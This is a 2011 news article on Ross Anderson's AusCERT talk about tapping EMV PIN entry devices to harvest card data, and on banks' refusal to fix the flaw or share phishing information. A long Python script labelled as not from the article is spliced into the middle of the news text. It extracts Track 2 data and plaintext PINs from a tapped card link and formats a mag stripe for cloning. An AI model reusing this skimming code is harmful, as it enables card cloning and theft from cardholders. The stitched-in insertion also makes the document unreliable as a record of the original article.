Credit card vulnerability still alive and well - AusCERT 2011

Lack of information sharing by banks helping phishing attacks

Cambridge University professor, Ross Anderson.


Global banks have yet to close a weakness in the Europay, Mastercard and Visa (EMV) integrated circuit card standard, first rolled out in 2003, that lets attackers plant Trojan hardware inside point of sale equipment to harvest card and PIN data.

EMV is the global standard used by card providers for integrated circuit (IC) debit and credit cards used in point of sale terminals and automatic teller machines (ATMs).

However, Cambridge University professor Ross Anderson said that in 2007 he and two students reverse engineered the PIN entry devices (PEDs) used with the standard and found a vulnerability in them.

“We found that if you went into the back of the product and drilled in, you could drop a paper clip on to the wire which is the serial port between the pin pad and the smart card,” he said.

With such a tap in place, he said, the device becomes a Trojan that harvests enough data from every transaction to make a mag stripe copy of the card and use it at any ATM.
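To make concrete why a passive tap on the PED-to-card serial link is enough, the following added example (not code from the article or from Anderson's work) parses a constructed capture of the APDU exchange between a PED and a card. The capture is assumed to be already de-framed into command and response APDUs; the PAN is a well-known test number, the PIN and cardholder name are made up, and the earlier SELECT and GET PROCESSING OPTIONS exchanges are omitted. It pulls the Track 2 Equivalent Data (EMV tag 57) out of the READ RECORD response and the plaintext PIN block out of the offline VERIFY command, then rebuilds the mag stripe track 2 string a cloner would encode.

```python
"""Recover mag-stripe track 2 data and the plaintext PIN from a tap on the
PED <-> card link. Added example; the trace below is constructed."""

from typing import Dict, List, Optional, Tuple

# Constructed capture, one (direction, hex) entry per APDU.
# "C" = command sent by the PED to the card, "R" = card response.
TRACE: List[Tuple[str, str]] = [
    # READ RECORD, record 1 of SFI 1 (P2 = SFI << 3 | 4)
    ("C", "00B2010C00"),
    # Record template (tag 70) holding tag 57 (Track 2 Equivalent Data)
    # and tag 5F20 (cardholder name), followed by status word 9000
    ("R", "7021" "5713" "4111111111111111D25122010000000000000F"
          "5F2009" "544553542043415244" "9000"),
    # VERIFY with P2 = 0x80: offline plaintext PIN, format-2 PIN block
    ("C", "0020008008" "241234FFFFFFFFFF"),
    ("R", "9000"),
]


def parse_tlv(data: bytes) -> Dict[str, bytes]:
    """Flatten BER-TLV into {tag_hex: value}, descending into constructed
    tags (bit 0x20 of the first tag byte set). Skips 00/FF padding."""
    out: Dict[str, bytes] = {}
    i = 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):
            i += 1
            continue
        start, first = i, data[i]
        i += 1
        if first & 0x1F == 0x1F:          # multi-byte tag, e.g. 5F20
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i].hex().upper()
        length = data[i]
        i += 1
        if length & 0x80:                 # long-form length
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        if first & 0x20:
            out.update(parse_tlv(value))  # constructed: recurse
        else:
            out[tag] = value
    return out


def decode_track2(value: bytes) -> Dict[str, str]:
    """Tag 57: PAN, 'D' separator, expiry YYMM, service code, discretionary
    data, padded with an F nibble to a whole byte."""
    nibbles = value.hex().upper().rstrip("F")
    pan, rest = nibbles.split("D", 1)
    return {"pan": pan, "expiry_yymm": rest[:4],
            "service_code": rest[4:7], "discretionary": rest[7:]}


def track2_stripe(t2: Dict[str, str]) -> str:
    """Track 2 as it is written to a mag stripe: ;PAN=YYMMSSSdisc?"""
    return f";{t2['pan']}={t2['expiry_yymm']}{t2['service_code']}{t2['discretionary']}?"


def decode_plaintext_pin_block(block: bytes) -> str:
    """ISO 9564 format-2 block: nibble 2, PIN length nibble, PIN, F padding."""
    h = block.hex().upper()
    if h[0] != "2":
        raise ValueError("not a format-2 plaintext PIN block")
    n = int(h[1], 16)
    return h[2:2 + n]


def luhn_ok(pan: str) -> bool:
    """Sanity check that the harvested PAN is a plausible card number."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def harvest(trace: List[Tuple[str, str]]) -> Dict[str, Optional[object]]:
    """Walk the capture once and collect what a tap sees in the clear."""
    found: Dict[str, Optional[object]] = {"track2": None, "pin": None, "name": None}
    for direction, hx in trace:
        b = bytes.fromhex(hx)
        if direction == "C" and len(b) >= 5 and b[1] == 0x20 and b[2:4] == b"\x00\x80":
            found["pin"] = decode_plaintext_pin_block(b[5:5 + b[4]])
        elif direction == "R" and len(b) >= 2 and b[-2:] == b"\x90\x00":
            tlv = parse_tlv(b[:-2])
            if "57" in tlv:
                found["track2"] = decode_track2(tlv["57"])
            if "5F20" in tlv:
                found["name"] = tlv["5F20"].decode("ascii").strip()
    return found


if __name__ == "__main__":
    r = harvest(TRACE)
    print("stripe:", track2_stripe(r["track2"]), "pin:", r["pin"], "name:", r["name"])
```

The PIN only appears in the clear when the card and terminal agree on offline plaintext PIN verification (VERIFY with P2 = 0x80); with enciphered offline PIN (P2 = 0x88) or online PIN it does not cross this link unencrypted, but tag 57 still does, which is why the tap alone yields a mag stripe clone.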

“We told the banks in October 2007 and they said `it’s not a problem because the criminals aren’t as clever as you Cambridge University chaps’. But this wasn’t true because bad guys were already doing it.”

In July 2008, criminals gained access to a warehouse in Dubai where the devices were stored and installed a Trojan device under the keypad, which was then used to harvest information from users' cards.

“It was possible for people to have a transaction done in a bank and have their credentials stolen,” he said. “The bank would then sue the user for negligence because it was not their fault.”

“In 2003 we were the pioneers [of EMV] and were told it was going to solve problems,” he said. “From the bank’s point of view it was a great rollout because the deal with EMV was that if there was a dispute [with a payment], then the user was liable.”

According to Anderson, banks had hoped EMV would make fraud decrease; in reality it increased.

A worrying factor, Anderson said, was the continuing vulnerabilities in EMV chip and PIN systems, coupled with the fact that banks, at least in the UK, do not share information about phishing and cybercriminal attacks.

“The banks need an incentive to get this right but they take a short term and country rather than global view of it,” he said.

“Banks could do better if they shared information on phishing,” said Anderson. “If bankers were rational then they wouldn’t have a problem.”

The lack of global and local laws requiring companies to disclose phishing or hacking attempts against internal systems continues to be a focal point for many security experts.

Hamish Barwick travelled to AusCERT 2011 as a guest of AusCERT
